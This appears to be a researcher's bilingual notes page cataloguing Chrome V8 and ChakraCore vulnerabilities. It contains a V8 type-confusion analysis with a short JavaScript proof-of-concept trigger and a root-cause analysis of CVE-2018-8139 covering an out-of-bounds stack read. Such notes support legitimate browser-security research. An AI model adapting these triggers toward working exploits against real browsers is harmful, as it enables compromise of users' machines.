Vulnerabilities from Chrome

Chrome

Bugs:715582

Bugs:732169

CVE-2017-5115/Bugs:744584

Bugs:746946

Bugs:752149

Bugs:757199

Bugs:765433

Bugs:762874

Bugs:772420

Bugs:776677

Bugs:784533

Bugs:788539

Bugs:787910

Bugs:791245

Bugs:791953

Bugs:794394

Bugs:794822

Bugs:797596

Bugs:794405/794359

Bugs:799263

Bugs:797130

Bugs:801627

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
Here's a snippet of NodeProperties::InferReceiverMaps.
case IrOpcode::kJSCreate: {
if (IsSame(receiver, effect)) {
HeapObjectMatcher mtarget(GetValueInput(effect, 0));
HeapObjectMatcher mnewtarget(GetValueInput(effect, 1));
if (mtarget.HasValue() && mnewtarget.HasValue()) {
Handle<JSFunction> original_constructor =
Handle<JSFunction>::cast(mnewtarget.Value());

if (original_constructor->has_initial_map()) {
Handle<Map> initial_map(original_constructor->initial_map());
if (initial_map->constructor_or_backpointer() ==
*mtarget.Value()) {
*maps_return = ZoneHandleSet<Map>(initial_map);
return result;
}
}
}
// We reached the allocation of the {receiver}.
return kNoReceiverMaps;
}
break;
}

“mnewtarget” is expected to be a constructor which also can be of type JSBoundFunction. But “mnewtarget” is always cast to JSFunction which leads to type confusion.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
PoC:
// Flags: --allow-natives-syntax --enable_slow_asserts

class Base {
constructor() {
this.x = 1;
}
}

class Derived extends Base {
constructor() {
// JSCreate emitted I guess.
super();
}
}

let bound = Object.bind();
Reflect.construct(Derived, [], bound); // Feed a bound function as new.target to the profiler, so HeapObjectMatcher can find it.

%OptimizeFunctionOnNextCall(Derived);

new Derived();

Bugs:802060

Bugs:802333

Bugs:803022

Bug: chromium:804801

Bugs:804837

Bugs:818144

https://bugs.chromium.org/p/chromium/issues/detail?id=818144
没找到patch

Bugs:818811

https://bugs.chromium.org/p/chromium/issues/detail?id=818811
没找到patch

Bugs:819311

Bugs:820984

Bug:822284

Bugs:829679

Edge

关注更新

https://github.com/Microsoft/ChakraCore/wiki/Roadmap

v1.8.3

CVE-2018-8139

不引入newTarget这个可选参数,就和new target(…args)用法一致
但是引入的话,就是为了在一些框架里满足一种罕见的需求,也就是要求用target来初始化实例,但是却要求表现出来的结果是newTarget的实例

  • root cause
    漏洞成因是BoundFunction::NewInstance在调用Target函数时,没有考虑到CallFlags_ExtraArg这个flag,所以没有拷贝ExtraArg(这里也就是newTarget)。
    从patch里可以看到,在patch之后,考虑到了这个flag。
    1
    2
    3
    4
    +           if (args.HasExtraArg())
    + {
    + newValues[index++] = args.Values[argCount];
    + }


但仍有CallFlags_NewTarget标记
导致在后面真正调用Target函数的时候,在InterpreterStackFrame::OP_LdNewTarget时,会从栈上的Args数组越界读取8个字节的内容


  • info leak
    能不能布置栈上数据?
  • how to find?
    对标志位的处理,逻辑bug,审计?

v1.8.4

CVE-2018-8229